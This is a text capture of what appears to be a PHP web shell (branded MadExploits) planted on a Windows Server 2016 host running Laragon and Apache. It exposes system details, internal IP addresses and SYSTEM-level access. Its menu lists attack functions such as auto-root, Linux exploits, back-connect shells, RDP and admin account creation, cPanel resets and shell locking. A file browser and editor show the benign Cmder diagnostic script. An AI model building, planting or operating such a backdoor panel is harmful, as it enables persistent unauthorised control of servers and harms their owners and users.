Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
alias.cmd
4.1
KB
-rwxrwxrwx
cexec.cmd
3.75
KB
-rwxrwxrwx
cmder_diag.cmd
1.41
KB
-rwxrwxrwx
cmder_diag.ps1
1.93
KB
-rw-rw-rw-
cmder_diag.sh
1.5
KB
-rw-rw-rw-
timer.cmd
911
B
-rwxrwxrwx
vscode_init.cmd
749
B
-rwxrwxrwx
vscode_init_args.cmd.default
1.13
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cmder_diag.ps1
if (test-path $env:temp\cmder_diag_ps.log) { remove-item $env:temp\cmder_diag_ps.log } $cmder_diag = { "" "------------------------------------" "get-childitem env:" "------------------------------------" get-childitem env: | ft -autosize -wrap 2>&1 "" "------------------------------------" "get-command git -all -ErrorAction SilentlyContinue" "------------------------------------" get-command git -all -ErrorAction SilentlyContinue "" "------------------------------------" "get-command clink -all -ErrorAction SilentlyContinue" "------------------------------------" get-command clink -all -ErrorAction SilentlyContinue "" "------------------------------------" "systeminfo" "------------------------------------" systeminfo 2>&1 "------------------------------------" "get-childitem '$env:CMDER_ROOT'" "------------------------------------" get-childitem "$env:CMDER_ROOT" |ft LastWriteTime,mode,length,FullName "" "------------------------------------" "get-childitem '$env:CMDER_ROOT/vendor'" "------------------------------------" get-childitem "$env:CMDER_ROOT/vendor" |ft LastWriteTime,mode,length,FullName "" "------------------------------------" "get-childitem -s '$env:CMDER_ROOT/bin'" "------------------------------------" get-childitem -s "$env:CMDER_ROOT/bin" |ft LastWriteTime,mode,length,FullName "" "------------------------------------" "get-childitem -s '$env:CMDER_ROOT/config'" "------------------------------------" get-childitem -s "$env:CMDER_ROOT/config" |ft LastWriteTime,mode,length,FullName "" "------------------------------------" "Make sure you sanitize this output of private data prior to posting it online for review by the CMDER Team!" "------------------------------------" } & $cmder_diag | out-file -filePath $env:temp\cmder_diag_ps.log get-content "$env:temp\cmder_diag_ps.log" write-host "" write-host Above output was saved in "$env:temp\cmder_diag_ps.log"
Close